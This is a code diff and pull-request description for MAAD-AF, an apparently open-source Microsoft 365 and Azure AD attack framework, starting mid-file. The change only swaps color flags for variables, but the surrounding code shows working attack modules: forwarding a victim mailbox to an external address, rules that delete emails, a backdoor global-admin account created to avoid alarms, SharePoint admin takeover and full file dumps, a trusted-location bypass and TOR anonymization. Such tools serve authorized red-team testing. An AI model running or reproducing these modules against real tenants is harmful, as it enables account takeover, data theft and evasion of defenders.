+$fg_darkmagents = @{ ForegroundColor = "DarkMagenta" }
+$fg_red = @{ ForegroundColor = "Red" }
+$fg_darkred = @{ ForegroundColor = "DarkRed" }
+$fg_yellow = @{ ForegroundColor = "Yellow" }
+$fg_darkyellow = @{ ForegroundColor = "DarkYellow" }
+
+# Background colors
+$bg_black = @{ BackgroundColor = "Black" }
+$bg_blue = @{ BackgroundColor = "Blue" }
+$bg_darkblue = @{ BackgroundColor = "DarkBlue" }
+$bg_cyan = @{ BackgroundColor = "Cyan" }
+$bg_darkcyan = @{ BackgroundColor = "DarkCyan" }
+$bg_green = @{ BackgroundColor = "Green" }
+$bg_darkgreen = @{ BackgroundColor = "DarkGreen" }
+$bg_gray = @{ BackgroundColor = "Gray" }
+$bg_darkgray = @{ BackgroundColor = "DarkGray" }
+$bg_magenta = @{ BackgroundColor = "Magenta" }
+$bg_darkmagents = @{ BackgroundColor = "DarkMagenta" }
+$bg_red = @{ BackgroundColor = "Red" }
+$bg_darkred = @{ BackgroundColor = "DarkRed" }
+$bg_yellow = @{ BackgroundColor = "Yellow" }
+$bg_darkyellow = @{ BackgroundColor = "DarkYellow" }

--- a/Library/MAAD_Mitre_Map.ps1
+++ b/Library/MAAD_Mitre_Map.ps1
@@ -17,17 +17,17 @@ $global:maad_mitre_map =
 "TORAnonymizer" = @{"tactic"="Command and Control"; "technique"="Proxy"; "sub-technique"="Multi-hop Proxy"; "description"="To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network."; "ref"="https://attack.mitre.org/techniques/T1090/003/"}};
 
 function mitre_details ($module_name){
-    Write-Host "`n###################################### MITRE ######################################" -ForegroundColor Gray
+    Write-Host "`n###################################### MITRE ######################################" @fg_gray
     try {
         Write-Host
-        Write-Host "Tactic:" $global:maad_mitre_map[$module_name]["tactic"]`n -ForegroundColor Gray
-        Write-Host "Technique:" $global:maad_mitre_map[$module_name]["technique"]`n -ForegroundColor Gray
+        Write-Host "Tactic:" $global:maad_mitre_map[$module_name]["tactic"]`n @fg_gray
+        Write-Host "Technique:" $global:maad_mitre_map[$module_name]["technique"]`n @fg_gray
         if ($global:maad_mitre_map[$module_name]["sub-technique"] -ne "") {
-            Write-Host "Sub-Technique:" $global:maad_mitre_map[$module_name]["sub-technique"]`n -ForegroundColor Gray
+            Write-Host "Sub-Technique:" $global:maad_mitre_map[$module_name]["sub-technique"]`n @fg_gray
         }
-        Write-Host "Description:" $global:maad_mitre_map[$module_name]["description"]`n -ForegroundColor Gray
-        Write-Host "Reference:" $global:maad_mitre_map[$module_name]["ref"] -ForegroundColor Gray
-        Write-Host "`n###################################################################################" -ForegroundColor Gray
+        Write-Host "Description:" $global:maad_mitre_map[$module_name]["description"]`n @fg_gray
+        Write-Host "Reference:" $global:maad_mitre_map[$module_name]["ref"] @fg_gray
+        Write-Host "`n###################################################################################" @fg_gray
     }
     catch {
         #Do-nothing

--- a/Library/MailForwarding.ps1
+++ b/Library/MailForwarding.ps1
@@ -18,11 +18,11 @@ function MailForwarding {
         Set-Mailbox -Identity $target_mailbox -DeliverToMailboxAndForward $true -ForwardingSMTPAddress $ExternalAccount -ErrorAction Stop
         Start-Sleep -s 10
         Get-Mailbox -Identity $target_mailbox | Format-List -Property ForwardingSMTPAddress
-        Write-Host "Successfully configured mailbox $target_mailbox to forward emails to $ExternalAccount!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "Successfully configured mailbox $target_mailbox to forward emails to $ExternalAccount!!!" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
-        Write-Host "Error: Failed to setup forwarding on the mailbox $target_mailbox!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "Error: Failed to setup forwarding on the mailbox $target_mailbox!!!" @fg_yellow @bg_black
     }
     
     #Undo changes
@@ -32,7 +32,7 @@ function MailForwarding {
         if ($user_confirm -notin "No","no","N","n") {
             Write-Host "Removing mailbox forwarding from mailbox: $target_mailbox ...`n"
             Set-Mailbox -Identity $target_mailbox -ForwardingSMTPAddress $null
-            Write-Host "`nUndo successful: Removed mailbox forwarding config!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "`nUndo successful: Removed mailbox forwarding config!!!" @fg_yellow @bg_black
         }
     }
     Pause    

--- a/Library/MailboxRuleSetup.ps1
+++ b/Library/MailboxRuleSetup.ps1
@@ -6,14 +6,14 @@ function MailboxDeleteRuleSetup {
     #Enter account to compromise
     $target_mailbox = $global:input_mailbox_address
     $InboxRuleName = Read-Host -Prompt "Enter a name for the mailbox rule you want to create"
-    Write-Host "`nConfiguring mailbox rule to delete emails from $target_mailbox mailbox containing specific terms" -ForegroundColor Gray
+    Write-Host "`nConfiguring mailbox rule to delete emails from $target_mailbox mailbox containing specific terms" @fg_gray
 
     #Take keywords for the mailbox rule
     do {
         $input_rule_keywords = Read-Host -Prompt "Enter a term or multiple terms separated by comma(,) to include in the mailbox rule"
 
         if ($input_rule_keywords -eq $null) {
-            Write-Host "Its not like giving a compliment. I am sure you can come up with a few words ;)" -ForegroundColor Red
+            Write-Host "Its not like giving a compliment. I am sure you can come up with a few words ;)" @fg_red
         }
     } while (
         $input_rule_keywords -eq $null
@@ -29,7 +29,7 @@ function MailboxDeleteRuleSetup {
 
         #Confirm rule setup
         Get-InboxRule -Mailbox $target_mailbox
-        Write-Host "`nNew mailbox rule has been deployed successfully!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nNew mailbox rule has been deployed successfully!!!" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
@@ -45,7 +45,7 @@ function MailboxDeleteRuleSetup {
             try {
                 Write-Host "`nRemoving the new mailbox rules created..."
                 Remove-InboxRule -Mailbox $target_mailbox -Identity $InboxRuleName -Confirm:$false -ErrorAction Stop
-                Write-Host "`nUndo successful: Removed mailbox rule: $InboxRuleName" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "`nUndo successful: Removed mailbox rule: $InboxRuleName" @fg_yellow @bg_black
             }
             catch {
                 Write-Host "`nError: Failed to delete mailbox rule $InboxRuleName!`n You can try to delete it manually from the Admin console."

--- a/Library/NewAdminAccountCreation.ps1
+++ b/Library/NewAdminAccountCreation.ps1
@@ -2,7 +2,7 @@ function NewAdminAccountCreation {
     mitre_details("NewAdminAccountCreation")
 
     #Create Admin Account
-    Write-Host "`nDisplaying available domain information:" -ForegroundColor Yellow
+    Write-Host "`nDisplaying available domain information:" @fg_yellow
     Get-AzureADDomain |Format-Table Name, SupportedServices, AuthenticationType
     $global:NewAdminUserName = Read-Host -Prompt 'Enter username for the new backdoor admin account (eg: user@domain.com)'
     $global:NewAdminUserPass = Read-Host -Prompt 'Enter password for the new backdoor admin account (must comply with password policy)'
@@ -15,7 +15,7 @@ function NewAdminAccountCreation {
         Write-Host "`nCreating new backdoor account ...`n"
         New-AzADUser -DisplayName $global:NewAdminDisplayName -UserPrincipalName $global:NewAdminUserName -Password $global:NewAdminUserPassSecure -MailNickName $global:NewAdminDisplayName -ErrorAction Stop | Out-File -FilePath .\Outputs\Backdoor_Account.txt
         Start-Sleep -Seconds 10
-        Write-Host "Successfully created new backdoor account!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "Successfully created new backdoor account!!!" @fg_yellow @bg_black
         Write-Host "`nDetails of backdoor account are logged in 'Backdoor_Account.txt'."
     }
     catch {
@@ -44,8 +44,8 @@ function NewAdminAccountCreation {
         Add-AzureADDirectoryRoleMember -ObjectId $global:GlobalAdminOId -RefObjectId $global:NewAdminUserOId -ErrorAction Stop
         Start-Sleep -Seconds 30
         #Add-RoleGroupMember -Identity "eDiscovery Manager" -Member $global:NewAdminUsername -ErrorAction Stop
-        Write-Host "`nSuccessfully assigned admin privileges to backdoor account: $global:NewAdminUserName" -ForegroundColor Yellow -BackgroundColor Black
-        Write-Host "`nNote: Selecting (Yes) will automatically restart the tool using new backdoor account and avoid raising alarms on the initially compromised user account" -ForegroundColor Gray
+        Write-Host "`nSuccessfully assigned admin privileges to backdoor account: $global:NewAdminUserName" @fg_yellow @bg_black
+        Write-Host "`nNote: Selecting (Yes) will automatically restart the tool using new backdoor account and avoid raising alarms on the initially compromised user account" @fg_gray
         $use_backdoor = Read-Host -Prompt "Would you like to use the backdoor account to perform future actions (Yes/No)"
     }
     catch {
@@ -59,8 +59,8 @@ function NewAdminAccountCreation {
         terminate_connection
         ClearActiveSessions
         #Re-login again with backdoor account
-        Write-Host "`nRestarting and configuring MAAD-AF to use backdoor account..." -ForegroundColor Yellow -BackgroundColor Black
-        Write-Host "Note: This can typically take a while and multiple attempts (which MAAD-AF will automatically attempt). Be patient.`n" -ForegroundColor Gray
+        Write-Host "`nRestarting and configuring MAAD-AF to use backdoor account..." @fg_yellow @bg_black
+        Write-Host "Note: This can typically take a while and multiple attempts (which MAAD-AF will automatically attempt). Be patient.`n" @fg_gray
         Start-Sleep -Seconds 5
         $attempt = 0
         #Create new credentials
@@ -78,8 +78,8 @@ function NewAdminAccountCreation {
                 AccessSharepoint $global:NewAdminUsername $global:NewAdminCredential
                 AccessSharepointAdmin $global:NewAdminUsername $global:NewAdminCredential
                 
-                Write-Host "Successfully logged in using new backdoor admin account!!!" -ForegroundColor Yellow -BackgroundColor Black
-                Write-Host "You are now logged in as $global:NewAdminDisplayName : $global:NewAdminUserName" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "Successfully logged in using new backdoor admin account!!!" @fg_yellow @bg_black
+                Write-Host "You are now logged in as $global:NewAdminDisplayName : $global:NewAdminUserName" @fg_yellow @bg_black
                 #Overwrite primary username for other modules
                 $global:AdminUsername = $global:NewAdminUserName
                 $global:OldAdminCredential = $global:AdminCredential
@@ -87,7 +87,7 @@ function NewAdminAccountCreation {
                 break
             }
             catch {
-                Write-Host "`nFailed to establish access to one or more services using backdoor account!" -ForegroundColor Red
+                Write-Host "`nFailed to establish access to one or more services using backdoor account!" @fg_red
                 $attempt++
                 Write-Host "`nAttempting connection again..."
                 Start-Sleep -Seconds 30
@@ -106,7 +106,7 @@ function NewAdminAccountCreation {
             Write-Host "`nDeleting AD user: $NewAdminUserName ..."
             Remove-AzureADUser -ObjectId $NewAdminUserOId
             Start-Sleep -Seconds 3
-            Write-Host "`nUndo successful: Deleted newly added backdoor account $NewAdminUserName" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "`nUndo successful: Deleted newly added backdoor account $NewAdminUserName" @fg_yellow @bg_black
         }
     }
     Pause

--- a/Library/ReconUserGroupRoles.ps1
+++ b/Library/ReconUserGroupRoles.ps1
@@ -18,7 +18,7 @@ function ReconUserGroupRoles {
         }
     }
 
-    Write-Host "`nFollowing role groups were found for user $target_account :" -ForegroundColor Gray
+    Write-Host "`nFollowing role groups were found for user $target_account :" @fg_gray
     $user_roles
 
     Write-Host "`nUser has: $($user_roles.Count)/$($all_roles.Count))`n" 

--- a/Library/RemoveAccess.ps1
+++ b/Library/RemoveAccess.ps1
@@ -8,8 +8,8 @@ function RemoveAccess {
     $target_account = $global:input_user_account
 
     if ($target_account -eq $global:AdminUsername){
-        Write-Host "`nSorry, you are too great to destroy yourself!" -ForegroundColor Red
-        Write-Host "Tip: Try deleting another account or create a backdoor account then use it to delete this account (MAAD can help you with that)" -ForegroundColor Gray
+        Write-Host "`nSorry, you are too great to destroy yourself!" @fg_red
+        Write-Host "Tip: Try deleting another account or create a backdoor account then use it to delete this account (MAAD can help you with that)" @fg_gray
         break
     }
 
@@ -18,10 +18,10 @@ function RemoveAccess {
         Write-Host "`nDeleting the selected account ..."
         Remove-AzureADUser -ObjectId $target_account -ErrorAction Stop
         Start-Sleep -s 5 
-        Write-Host "`nAccount: $target_account successfully deleted!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nAccount: $target_account successfully deleted!" @fg_yellow @bg_black
     }
     catch {
-        Write-Host "`nError: Failed to delete account $target_account" -ForegroundColor Red
+        Write-Host "`nError: Failed to delete account $target_account" @fg_red
     }
     
 }

--- a/Library/SharepointExploiter.ps1
+++ b/Library/SharepointExploiter.ps1
@@ -5,7 +5,7 @@ function SharepointExploiter {
     $sharepoint_options = @{0 = "Back to main menu"; 1 = "Retrieve Sharepoint Access Token"; 2 = "List all sites in the tenant"; 3 = "Explore a sharepoint site"; 4 = "Gain rights to a sharepoint site"}
     #$sharepoint_options = @{0 = "Back to main menu"; 1 = "Retrieve Sharepoint Access Token"; 2 = "List all sites in the tenant"; 3 = "Explore a sharepoint site"; 4 = "Gain rights to a sharepoint site"; 5 = "Remove rights from a sharepoint site (Undo option 4)"}
     do {
-        Write-Host "`n`nSharepoint options:" -ForegroundColor Yellow
+        Write-Host "`n`nSharepoint options:" @fg_yellow
         foreach ($key in $sharepoint_options.keys){
             Write-Host $key ':' $sharepoint_options[$key]
         }    
@@ -31,7 +31,7 @@ function SharepointExploiter {
 
          if ($recon_user_choice -eq 2) {
             #List all sites in tenant
-            Write-Host "`nListing all available sites in sharepoint ...`n" -ForegroundColor Yellow
+            Write-Host "`nListing all available sites in sharepoint ...`n" @fg_yellow
             Get-SPOSite | Format-Table URL
          }
 
@@ -81,7 +81,7 @@ function SharepointExploiter {
             try {
                 Set-SPOUser -Site $site_list[$site_choice-1].URL -LoginName $global:AdminUsername -IsSiteCollectionAdmin $true -ErrorAction Stop
                 Start-Sleep -Seconds 5
-                Write-Host "Successfully gained admin rights in sharepoint site $($site_list[$site_choice-1].URL)" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "Successfully gained admin rights in sharepoint site $($site_list[$site_choice-1].URL)" @fg_yellow @bg_black
             }
             catch {
                 Write-Host "Error : Failed to get admin rights in sharepoint site $($site_list[$site_choice-1].URL)"

--- a/Library/SharepointSiteExploiter.ps1
+++ b/Library/SharepointSiteExploiter.ps1
@@ -3,14 +3,14 @@ function SharepointSiteExploiter {
     #Exploring site
 
     $sharepoint_site_name = $sharepoint_site.split("/")[-1]
-    Write-Host "`nExploring sharepoint site: $sharepoint_site" -ForegroundColor Yellow
+    Write-Host "`nExploring sharepoint site: $sharepoint_site" @fg_yellow
 
     try {
         Connect-PnPOnline -Url $sharepoint_site -Credentials $global:AdminCredential 
     }
     catch {
         if ($_ -match "Forbidden"){
-            Write-Host "`nI guess you can't get everything!`nThe current user DOES NOT have access to this sharepoint site. Try another site from the list or attempt to gain access to this site usinf module (4)." -ForegroundColor Red
+            Write-Host "`nI guess you can't get everything!`nThe current user DOES NOT have access to this sharepoint site. Try another site from the list or attempt to gain access to this site usinf module (4)." @fg_red
             return
         }
     }
@@ -18,8 +18,8 @@ function SharepointSiteExploiter {
     $sharepoint_site_options = @{0 = "Back to previous menu"; 1 = "Retrieve Sharepoint Groups in the current connected site"; 2 = "Retrieve all users from the User Information List of the current site collection"; 3 = "Retrieve users with rights assigned"; 4 = "Find and list folders in sharepoint site"; 5 = "Search files in sharepoint site"; 6 = "Dump all files from site";}
     
     do{ 
-        Write-Host "`nSharepoint site options:" -ForegroundColor Yellow
-        Write-Host "You are currently exploring site: $sharepoint_site_name" -ForegroundColor Gray
+        Write-Host "`nSharepoint site options:" @fg_yellow
+        Write-Host "You are currently exploring site: $sharepoint_site_name" @fg_gray
 
         OptionDisplay "Select Site Action:" $sharepoint_site_options
 
@@ -55,8 +55,8 @@ function SharepointSiteExploiter {
 
         if ($recon_user_choice -eq 4) {
             #Get users in current site with rights assigned
-            Write-Host "`nSearching recursively to find all folders ..." -ForegroundColor Yellow
-            Write-Host "Note: Search results can sometimes be too large. The output will be saved to file as 'Sharepoint_Folder_Search_Report' in the /Outputs directory" -ForegroundColor Gray
+            Write-Host "`nSearching recursively to find all folders ..." @fg_yellow
+            Write-Host "Note: Search results can sometimes be too large. The output will be saved to file as 'Sharepoint_Folder_Search_Report' in the /Outputs directory" @fg_gray
             $current_time = Get-Date -Format "dd_MM_dd_yyyy_HH_mm"
             Get-PnPFolderItem -FolderSiteRelativeUrl "/" -ItemType Folder -Recursive  | Out-File -FilePath .\Outputs\SharePoint_Folder_Search_Report_$current_time.txt
         }
@@ -78,11 +78,11 @@ function SharepointSiteExploiter {
 
                 if ($keyword -ne ""){
                     #Searching for file
-                    Write-Host "`nSearching files matching keyword: $keyword" -ForegroundColor Yellow
-                    Write-Host "Note: Search results can sometimes be large. The results will be saved in the /Outputs directory" -ForegroundColor Gray
+                    Write-Host "`nSearching files matching keyword: $keyword" @fg_yellow
+                    Write-Host "Note: Search results can sometimes be large. The results will be saved in the /Outputs directory" @fg_gray
                     $current_time = Get-Date -Format "dd_MM_dd_yyyy_HH_mm"
                     Find-PnPFile -Match *$keyword* | Out-File -FilePath .\Outputs\SharePoint_File_Search_Report_$current_time.txt
-                    Write-Host "Note: You can type 'exit' to go back to previous menu" -ForegroundColor Gray
+                    Write-Host "Note: You can type 'exit' to go back to previous menu" @fg_gray
                 }
                 
             }
@@ -92,15 +92,15 @@ function SharepointSiteExploiter {
         if ($recon_user_choice -eq 6) {
             #Create a download folder
             if ((Test-Path -Path ".\Outputs\SharepointDump\$sharepoint_site_name") -eq $false){
-                Write-Host "`nCreating directory 'SharePointDump\$sharepoint_site_name' in current local working path to dump all files...`n" -ForegroundColor Yellow
+                Write-Host "`nCreating directory 'SharePointDump\$sharepoint_site_name' in current local working path to dump all files...`n" @fg_yellow
                 New-Item -ItemType Directory -Force -Path .\Outputs\SharepointDump\$sharepoint_site_name | Out-Null
             }
 
             #Check user preference
-            Write-Host "`nNote: You can choose to download all files of a specific type such as 'docx' 'pdf' 'DWG'" -ForegroundColor Gray
+            Write-Host "`nNote: You can choose to download all files of a specific type such as 'docx' 'pdf' 'DWG'" @fg_gray
             $user_file_pref = Read-Host -Prompt "Enter the specific file extension -OR- leave blank and hit 'Enter' if you would like to dump all files from the site"
 
-            Write-Host "`nInitiating file dump from Sharepoint site: $sharepoint_site ..." -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "`nInitiating file dump from Sharepoint site: $sharepoint_site ..." @fg_yellow @bg_black
             
             Write-Host "`nTraversing through site to find all files in the site ..." 
             if ($user_file_pref -eq $null -or $user_file_pref -eq ""){
@@ -112,8 +112,8 @@ function SharepointSiteExploiter {
 
             Write-Host "Found $($all_files.Length) files in the site`n"
             Write-Host "Preparing to dump all found files to local directory..."
-            Write-Host "Resolving relative download paths for files..." -ForegroundColor Gray
-            Write-Host "Downloading files..." -ForegroundColor Gray
+            Write-Host "Resolving relative download paths for files..." @fg_gray
+            Write-Host "Downloading files..." @fg_gray
             Write-Progress -Activity "Sharepoint file dump in progress" -Status "0% complete:" -PercentComplete 0;
             
             $counter = 0
@@ -125,10 +125,10 @@ function SharepointSiteExploiter {
                 Write-Progress -Activity "Sharepoint file dump in progress" -Status "$([math]::Round($counter/$all_files.Length * 100))% complete:" -PercentComplete ([math]::Round($counter/$all_files.Length * 100));
             }
 
-            Write-Host "`nSharepoint site dump successful!!!" -ForegroundColor Yellow
-            Write-Host "Total files downloaded: $counter/$($all_files.Length)"  -ForegroundColor Yellow
+            Write-Host "`nSharepoint site dump successful!!!" @fg_yellow
+            Write-Host "Total files downloaded: $counter/$($all_files.Length)"  @fg_yellow
             #$download_size = “{0:N2}” -f ((Get-ChildItem -path ".\SharepointDump\$sharepoint_site_name" -recurse | Measure-Object -property length -sum ).sum /1MB) + ” MB”
-            Write-Host "Total data downloaded from site: $download_size"  -ForegroundColor Yellow
+            Write-Host "Total data downloaded from site: $download_size"  @fg_yellow
         }
     } while($recon_user_choice -ne 0)
 }

--- a/Library/TORAnonymizer.ps1
+++ b/Library/TORAnonymizer.ps1
@@ -6,14 +6,14 @@ function TORAnonymizer ($command){
         $inititate_anonymity = Read-Host -Prompt "`nWould you like to keep your traffic anonymous? (Yes/No)"
 
         if ($inititate_anonymity -notin "No","no","N","n") {
-            Write-Host "`n#####################Important Information#####################" -ForegroundColor Red
+            Write-Host "`n#####################Important Information#####################" @fg_red
             Write-Host "To offer anonymity the tool will attempt to route your traffic through TOR nodes."
             Write-Host "Selecting (Yes) will attempt to hide the source of your traffic by executing TOR and configuring your device to use a proxy(tool can do this automatically)."
             Write-Host "Enabling TOR may result in overall slower network traffic simply due to the nature of it."
             Write-Host "Selecting (No) will not make any changes to your host or network and MAAD-AF will continue as usual."
             Write-Host "Enabling TOR module requires TOR executable installed on your host, if not already installed."
             Write-Host "If you do not have the TOR executable installed on your host please select (No) now to skip using TOR."
-            Write-Host "###############################################################" -ForegroundColor Red
+            Write-Host "###############################################################" @fg_red
             $inititate_anonymity = Read-Host -Prompt "`nWould you like to continue and establish anonymity? (Yes/No)"
         }
         
@@ -21,8 +21,8 @@ function TORAnonymizer ($command){
             mitre_details("TORAnonymizer")
             #Check from global config file if TOR config file has been added by user
             if ($global:tor_root_directory -eq "C:\Users\username\sub_folder\Tor Browser"){
-                Write-Host "TOR executable not found on the host!!!" -ForegroundColor Red
-                Write-Host "`nTip:`n1. Check there's have TOR installed on your host. Checkout: https://www.torproject.org/`n2. Update the TOR direcotry path in MAAD_Config.ps1" -ForegroundColor Gray
+                Write-Host "TOR executable not found on the host!!!" @fg_red
+                Write-Host "`nTip:`n1. Check there's have TOR installed on your host. Checkout: https://www.torproject.org/`n2. Update the TOR direcotry path in MAAD_Config.ps1" @fg_gray
                 Write-Host "`nNote: MAAD-AF will now continue without TOR!!!"
                 return
             }
@@ -36,9 +36,9 @@ function TORAnonymizer ($command){
             Write-Host "Configuring Proxy on host to route traffic through TOR..."
             try {
                 Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyServer -Value "http://127.0.0.1:9150" -ErrorAction Stop
-                Write-Host "- Successfully modified keys to add TOR proxy!" -ForegroundColor Gray
+                Write-Host "- Successfully modified keys to add TOR proxy!" @fg_gray
                 Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyEnable -Value 1 -ErrorAction Stop
-                Write-Host "- Successfully modified keys to enable TOR proxy!" -ForegroundColor Gray
+                Write-Host "- Successfully modified keys to enable TOR proxy!" @fg_gray
                 $global:tor_proxy = $true
             }
             catch {
@@ -47,16 +47,16 @@ function TORAnonymizer ($command){
             }
 
             Write-Host "Routing traffic through TOR nodes..."
-            Write-Host "Going Dark!!! You are now anonymous!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "Going Dark!!! You are now anonymous!!!" @fg_yellow @bg_black
         }
     }
 
     if ($command -eq "stop" -and $global:tor_proxy -eq $true) {
         try {
             Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyServer -Value "" -ErrorAction Stop
-            Write-Host "`n- Successfully removed TOR proxy!" -ForegroundColor Gray
+            Write-Host "`n- Successfully removed TOR proxy!" @fg_gray
             Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyEnable -Value 0 -ErrorAction Stop
-            Write-Host "- Successfully disabled proxy!" -ForegroundColor Gray
+            Write-Host "- Successfully disabled proxy!" @fg_gray
             Write-Host "`Successfully reverted all network changes made by the tool!!!`n"
             $global:tor_proxy = $false
         }
@@ -80,7 +80,7 @@ function TORProxy {
     $geo_IPv6_file = "$global:tor_root_directory\Browser\TorBrowser\Data\Tor\geoip6"
 
     #Run TOR proxy
-    Write-Host "Running TOR..." -ForegroundColor Red
+    Write-Host "Running TOR..." @fg_red
     Write-Host "Hit 'Ctrl+C' to stop Tor!"
     & "$tor_exe" --defaults-torrc $torrc_defaults -f $torrc DataDirectory $tor_data GeoIPFile $geo_IP_file GeoIPv6File $geo_IPv6_file +__ControlPort $global:control_port +__HTTPTunnelPort "${global:tor_host}:$global:tor_port IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess $PID | more
 }

--- a/Library/TrustedNetworkConfig.ps1
+++ b/Library/TrustedNetworkConfig.ps1
@@ -15,7 +15,7 @@ function TrustedNetworkConfig {
         Pause
 
         if ($ip_addr -eq "") {
-            Write-Host "`nFailed to resolve IP automatically." -ForegroundColor Gray
+            Write-Host "`nFailed to resolve IP automatically." @fg_gray
             $ip_addr = Read-Host -Prompt "Manually enter IP address to add as trusted named location"
         }
     }
@@ -25,7 +25,7 @@ function TrustedNetworkConfig {
         Write-Host "Creating policy $trusted_policy_name to add your IP as trusted named location...`n"
         $trusted_nw = New-AzureADMSNamedLocationPolicy -OdataType "#microsoft.graph.ipNamedLocation" -DisplayName $trusted_policy_name -IsTrusted $true -IpRanges "$ip_addr/32" -ErrorAction Stop
         $trusted_nw
-        Write-Host "Successfully created trusted location policy $trusted_policy_name with IP $ip_addr !!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "Successfully created trusted location policy $trusted_policy_name with IP $ip_addr !!!" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
@@ -41,10 +41,10 @@ function TrustedNetworkConfig {
             try {
                 Write-Host "Removing trusted location policy: $trusted_policy_name ...`n"
                 Remove-AzureADMSNamedLocationPolicy -PolicyId $trusted_nw.Id
-                Write-Host "Undo successful: Removed the trusted location policy!!!" -ForegroundColor Yellow
+                Write-Host "Undo successful: Removed the trusted location policy!!!" @fg_yellow
             }
             catch {
-                Write-Host "Failed to remove the trusted location policy!!!" -ForegroundColor Red
+                Write-Host "Failed to remove the trusted location policy!!!" @fg_red
             }
             
         }

--- a/MAAD_Attack.ps1
+++ b/MAAD_Attack.ps1
@@ -37,7 +37,7 @@ TORAnonymizer("start")
 ###Main Script###
 while ($true) {
     #Display primary modes
-    Write-Host "`n                    ___MAAD-AF Modes___`n(1)Pre-compromise                  (2)Exploit M365/AzureAD`n" -ForegroundColor Yellow
+    Write-Host "`n                    ___MAAD-AF Modes___`n(1)Pre-compromise                  (2)Exploit M365/AzureAD`n" @fg_yellow
     
     [int]$mode = Read-Host "Choose mode:"
     switch ($mode) {


### PR DESCRIPTION
This PR adds color definitions as variables inside the `Library\MAAD_Colors.ps1` file.  This file will be sourced alongside everything else when `MAAD_Attack.ps1` is launched.  This change seems trivial, but it cleans up a lot of code in nearly every file.  

Instead of:

`Write-Host "Lorem ipsum" -ForegroundColor Yellow -BackgroundColor Black"`

Instead use:

`Write-Host "Lorem ipsum" @fg_yellow @bg_black`

All references to `-ForegroundColor` or `-BackgroundColor` were replaced with the variable name.  Colors seem to display as they did before after change.  Also includes some minor spelling corrections and moves references to `org.com` to `example.com`.